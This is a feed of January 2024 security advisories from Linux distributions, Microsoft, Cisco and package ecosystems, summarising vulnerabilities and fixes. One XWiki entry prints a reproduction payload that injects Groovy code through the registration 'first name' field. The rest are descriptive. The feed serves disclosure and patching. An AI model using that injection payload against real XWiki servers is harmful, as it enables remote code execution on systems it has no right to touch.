07.01.2024 02:00:00	gentoo	[GLSA-202401-09] Eclipse Mosquitto: Multiple Vulnerabilities (low)	Multiple vulnerabilities have been found in Eclipse Mosquitto which could result in denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-09
07.01.2024 02:00:00	gentoo	[GLSA-202401-12] Synapse: Multiple Vulnerabilities (low)	Multiple vulnerabilites have been found in Synapse, the worst of which could result in information leaks.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-12
07.01.2024 02:00:00	gentoo	[GLSA-202401-08] util-linux: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in util-linux which can lead to denial of service or information disclosure.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-08
07.01.2024 02:00:00	gentoo	[GLSA-202401-10] Mozilla Firefox: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-10
07.01.2024 02:00:00	gentoo	[GLSA-202401-11] Apache Batik: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in Apache Batik, the worst of which could result in arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-11
06.01.2024 20:20:30	composer	[PHP:AWS-AWS-SDK-PHP-2023-51651] Potential URI resolution path traversal in the AWS SDK for PHP		https://secdb.nttzen.cloud/security-advisory/composer/PHP:AWS-AWS-SDK-PHP-2023-51651
08.01.2024 16:59:53	almalinux	[ALSA-2024:0046] squid:4 security update (important)	squid:4 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0046
09.01.2024 23:52:48	npm	[NPM:GHSA-4JH3-6JHV-2MGP] react-native-mmkv Insertion of Sensitive Information into Log File vulnerability (moderate)	## SummaryBefore version [v2.11.0](https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0), the react-native-mmkv logged the optional encryption key for the MMKV database into the Android system log. The key can be obtained by anyone with access to the Android Debugging Bridge (ADB) if it is enabled in the phone settings. This bug is not present on iOS devices.## DetailsThe bridge for communicating between JS code and native code on Android logs the encryption key. This was fixed in commit [a8995cc](https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d) by only logging whether encryption is used.## ImpactThe encryption of an MMKV database protects data from higher privilege processes on the phone that can access the app storage. Additionally, if data in the app's storage is encrypted, it is also encrypted in potential backups.By logging the encryption secret to the system logs, attackers can trivially recover the secret by enabling ADB and undermining an app's thread model.The bug was discovered and fixed by somebody else. Not me. I'm just reporting this so users of react-native-mmkv upgrade the dependency.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4JH3-6JHV-2MGP
09.01.2024 20:41:28	ubuntu	[USN-6548-4] Linux kernel (GKE) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6548-4
09.01.2024 20:30:25	ubuntu	[USN-6573-1] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6573-1
09.01.2024 20:04:06	ubuntu	[USN-6572-1] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6572-1
09.01.2024 19:15:12	alpinelinux	[ALPINE:CVE-2023-6129] openssl vulnerability	[From CVE-2023-6129] Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6129
09.01.2024 16:51:55	ubuntu	[USN-6571-1] Monit vulnerability (high)	Monit could be made to bypass authentication checks for disabled accounts.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6571-1
09.01.2024 15:08:13	ubuntu	[USN-6038-2] Go vulnerabilities (critical)	Several security issues were fixed in Go.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6038-2
09.01.2024 12:29:04	ubuntu	[USN-6570-1] PostgreSQL vulnerabilities (high)	Several security issues were fixed in PostgreSQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6570-1
09.01.2024 21:26:04	maven	[MAVEN:GHSA-5GWH-R76W-934H] Qualys Jenkins Plugin for WAS XML External Entity vulnerability (moderate)	Qualys Jenkins Plugin for WAS prior to version and including 2.0.11 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5GWH-R76W-934H
09.01.2024 20:50:05	maven	[MAVEN:GHSA-8525-52VG-JV6V] Qualys Jenkins Plugin for Policy Compliance XML External Entity vulnerability (moderate)	Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8525-52VG-JV6V
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20674] Windows Kerberos Security Feature Bypass Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20674
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20677] Microsoft Office Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20677
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20676] Azure Storage Mover Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20676
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20654] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20654
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20657] Windows Group Policy Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20657
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20658] Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20658
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20680] Windows Message Queuing Client (MSMQC) Information Disclosure (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20680
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20682] Windows Cryptographic Services Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20682
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20683] Win32k Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20683
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20690] Windows Nearby Sharing Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20690
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20691] Windows Themes Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20691
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20694] Windows CoreMessaging Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20694
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20696] Windows Libarchive Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20696
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20697] Windows Libarchive Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20697
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20698] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20698
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20699] Windows Hyper-V Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20699
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20700] Windows Hyper-V Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20700
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21305] Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21305
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21307] Remote Desktop Client Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21307
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21313] Windows TCP/IP Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21313
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21325] Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21325
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20672] .NET Core and Visual Studio Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20672
09.01.2024 10:00:00	msrc	[MS:CVE-2024-0056] Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0056
09.01.2024 10:00:00	msrc	[MS:CVE-2024-0057] NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20652] Windows HTML Platforms Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20652
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20653] Microsoft Common Log File System Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20653
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20655] Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20655
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20656] Visual Studio Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20656
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20660] Microsoft Message Queuing Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20660
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20661] Microsoft Message Queuing Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20661
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20662] Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20662
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20663] Windows Message Queuing Client (MSMQC) Information Disclosure (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20663
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20664] Microsoft Message Queuing Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20664
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21316] Windows Server Key Distribution Service Security Feature Bypass (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21316
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20681] Windows Subsystem for Linux Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20681
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20686] Win32k Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20686
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20687] Microsoft AllJoyn API Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20687
09.01.2024 10:00:00	msrc	[MS:CVE-2024-20692] Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20692
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21306] Microsoft Bluetooth Driver Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21306
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21309] Windows Kernel-Mode Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21309
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21310] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21310
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21311] Windows Cryptographic Services Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21311
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21312] .NET Framework Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21312
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21314] Microsoft Message Queuing Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21314
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21318] Microsoft SharePoint Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21318
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21319] Microsoft Identity Denial of service vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21319
09.01.2024 10:00:00	msrc	[MS:CVE-2024-21320] Windows Themes Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21320
09.01.2024 10:00:00	msrc	[MS:CVE-2022-35737] MITRE: CVE-2022-35737 SQLite allows an array-bounds overflow (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2022-35737
09.01.2024 02:00:00	redhat	[RHSA-2024:0089] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0089
08.01.2024 20:05:14	ubuntu	[USN-6569-1] libclamunrar vulnerabilities (high)	Several security issues were fixed in libclamunrar.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6569-1
08.01.2024 19:58:27	ubuntu	[USN-6568-1] ClamAV update	ClamAV was updated to remain compatible with signature database downloads.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6568-1
08.01.2024 19:46:08	ubuntu	[USN-6567-1] QEMU vulnerabilities (high)	Several security issues were fixed in QEMU.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6567-1
09.01.2024 18:12:43	maven	[MAVEN:GHSA-8959-RFXH-R4J4] XWiki vulnerable to Denial of Service attack through attachments (high)	### ImpactA user able to attach a file to a page can post a malformed TAR file by manipulating file modification times headers, which when parsed by Tika, could cause a denial of service issue via CPU consumption. ### PatchesThis vulnerability has been patched in XWiki 14.10.18, 15.5.3 and 15.8 RC1.### WorkaroundsThe workaround is to download [commons-compress 1.24](https://search.maven.org/remotecontent?filepath=org/apache/commons/commons-compress/1.24.0/commons-compress-1.24.0.jar) and replace the one located in XWiki `WEB-INF/lib/` folder.### Referenceshttps://jira.xwiki.org/browse/XCOMMONS-2796### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8959-RFXH-R4J4
08.01.2024 20:37:00	maven	[MAVEN:GHSA-RJ7P-XJV7-7229] XWiki Remote Code Execution Vulnerability via User Registration (critical)	### ImpactXWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests.To reproduce, register with any username and password and the following payload as "first name": `]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded){{/groovy}}{{/async}}`. In the following page that confirms the success of the registration, the full first name should be displayed, linking to the created user. If the formatting is broken and a log message with content "ERROR attacker - Attack succeeded!" is logged, the attack succeeded.### PatchesThis vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1.### WorkaroundsIn the administration of your wiki, under "Users & Rights" > "Registration" set the "Registration Successful Message" to the following code:```velocity#set($message = $services.localization.render('core.register.successful', 'xwiki/2.1', ['USERLINK', $userName]))#set($userLink = $xwiki.getUserName("$userSpace$userName")){{info}}$message.replace('USERLINK', "{{html clean=false}}$userLink{{/html}}"){{/info}}```### References* https://jira.xwiki.org/browse/XWIKI-21173* https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RJ7P-XJV7-7229
09.01.2024 18:12:38	maven	[MAVEN:GHSA-XH35-W7WG-95V3] XWiki has no right protection on rollback action (high)	### ImpactThe rollback action is missing a right protection: it means that a user can rollback to a previous version of the page to gain rights they don't have anymore. This vulnerability impacts all version of XWiki since rollback action is available. ### PatchesThe problem has been patched in XWiki 14.10.16, 15.5.3 and 15.8-rc-1 by ensuring that the rights are checked before performing the rollback. ### WorkaroundsThere's no workaround for this vulnerability, except paying attention to delete old versions of documents that could allow users to gain more rights. ### References* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-21257* Commit: [4de72875ca49602796165412741033bfdbf1e680](https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680)### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XH35-W7WG-95V3
08.01.2024 18:47:58	npm	[NPM:GHSA-V2V2-HPH8-Q5XP] @fastify/reply-from JSON Content-Type parsing confusion (moderate)	### ImpactThe main repo of fastify use [fast-content-type-parse](https://github.com/fastify/fast-content-type-parse) to parse request Content-Type, which will [trim after split](https://github.com/fastify/fast-content-type-parse/blob/2776d054dd48e9ce40b8d5e5ff9b46fee82b95f1/index.js#L59).The [fastify-reply-from](https://github.com/fastify/fastify-reply-from/blob/b79a22d6eb9a0b52cfbe8eb2cb22ad65f5a39e64/index.js#L118C14-L118C14) have not use this repo to unify the parse of Content-Type, which [won't trim](https://github.com/fastify/fastify-reply-from/blob/b79a22d6eb9a0b52cfbe8eb2cb22ad65f5a39e64/index.js#L118C14-L118C14).As a result, a reverse proxy server built with `@fastify/reply-from` could misinterpret the incoming body by passing an header `ContentType: application/json ; charset=utf-8`. This can lead to bypass of security checks.### Patches`@fastify/reply-from` v9.6.0 include the fix. ### WorkaroundsThere are no known workarounds.### ReferencesHackerone Report: https://hackerone.com/reports/2295770.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V2V2-HPH8-Q5XP
09.01.2024 21:59:21	rubysec	[RUBYSEC:PUMA-2024-21647] Puma HTTP Request/Response Smuggling vulnerability (medium)	### ImpactPrior to versions 6.4.2 and 5.6.8, puma exhibited incorrectbehavior when parsing chunked transfer encoding bodies in away that allowed HTTP request smuggling.Fixed versions limit the size of chunk extensions. Without thislimit, an attacker could cause unbounded resource (CPU, networkbandwidth) consumption.### PatchesThe vulnerability has been fixed in 6.4.2 and 5.6.8.### WorkaroundsNo known workarounds.### References* [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)* Open an issue in [Puma](https://github.com/puma/puma)* See our [security policy](https://github.com/puma/puma/security/policy)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PUMA-2024-21647
08.01.2024 17:49:04	maven	[MAVEN:GHSA-HR2C-P8RH-238H] Apache Axis Improper Input Validation vulnerability (moderate)	UNSUPPORTED WHEN ASSIGNED Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRF.This issue affects Apache Axis through 1.3.As Axis 1 has been EOL, we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HR2C-P8RH-238H
09.01.2024 23:52:42	npm	[NPM:GHSA-FQH6-6H6C-366M] CouchAuth host header injection vulnerability leaks the password reset token (high)	A host header injection vulnerability exists in the NPM package @perfood/couch-auth versions <= 0.20.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users' passwords and take over their accounts.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQH6-6H6C-366M
09.01.2024 21:09:00	npm	[NPM:GHSA-WJC4-73Q6-GV3M] plotly.js prototype pollution vulnerability (critical)	In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJC4-73Q6-GV3M
09.01.2024 21:03:25	npm	[NPM:GHSA-JCHW-25XP-JWWC] Follow Redirects improperly handles URLs in the url.parse() function (moderate)	Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JCHW-25XP-JWWC
08.01.2024 17:56:29	maven	[MAVEN:GHSA-3VVH-8C65-32J4] Mingsoft MCMS SQL injection (high)	Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3VVH-8C65-32J4
08.01.2024 17:56:30	npm	[NPM:GHSA-RCVR-8WHX-3M5P] Layui cross-site scripting (XSS) vulnerability (moderate)	layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCVR-8WHX-3M5P
11.01.2024 00:36:53	ubuntu	[USN-6577-1] Linux kernel (AWS) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6577-1
10.01.2024 23:55:12	ubuntu	[USN-6549-5] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6549-5
10.01.2024 20:42:19	ubuntu	[USN-6548-5] Linux kernel (IoT) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6548-5
10.01.2024 20:19:33	ubuntu	[USN-6576-1] Linux kernel (OEM) vulnerability (high)	The system could be made to crash or run programs as an administrator.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6576-1
10.01.2024 18:15:46	alpinelinux	[ALPINE:CVE-2023-41056] redis vulnerability (high)	[From CVE-2023-41056] Redis is an in-memory database that persists on disk. Redis incorrectly handles resizing of memory buffers which can result in integer overflow that leads to heap overflow and potential remote code execution. This issue has been patched in version 7.0.15 and 7.2.4.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-41056
10.01.2024 18:00:00	cisco	[CISCO-SA-TMS-PORTAL-XSS-AXNEVG3S] Cisco TelePresence Management Suite Cross-Site Scripting Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco TelePresence Management Suite (TMS) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-TMS-PORTAL-XSS-AXNEVG3S
10.01.2024 18:00:00	cisco	[CISCO-SA-THOUSEYES-PRIVESC-DMZHG3QV] Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root.This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-THOUSEYES-PRIVESC-DMZHG3QV
10.01.2024 18:00:00	cisco	[CISCO-SA-SB-WAP-INJECT-BHSTWGXO] Cisco WAP371 Wireless Access Point Command Injection Vulnerability (medium)	A vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device.This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device.There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-WAP-INJECT-BHSTWGXO
10.01.2024 18:00:00	cisco	[CISCO-SA-PI-EPNM-WKZJEYEQ] Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Vulnerabilities (medium)	Multiple vulnerabilities in Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure could allow an attacker to conduct cross-site scripting (XSS) attacks, execute arbitrary commands, perform SQL injection attacks, or gain elevated privileges on an affected system.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PI-EPNM-WKZJEYEQ
10.01.2024 18:00:00	cisco	[CISCO-SA-CUC-UNAUTH-AFU-FROYSCSD] Cisco Unity Connection Unauthenticated Arbitrary File Upload Vulnerability (critical)	A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system.This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUC-UNAUTH-AFU-FROYSCSD
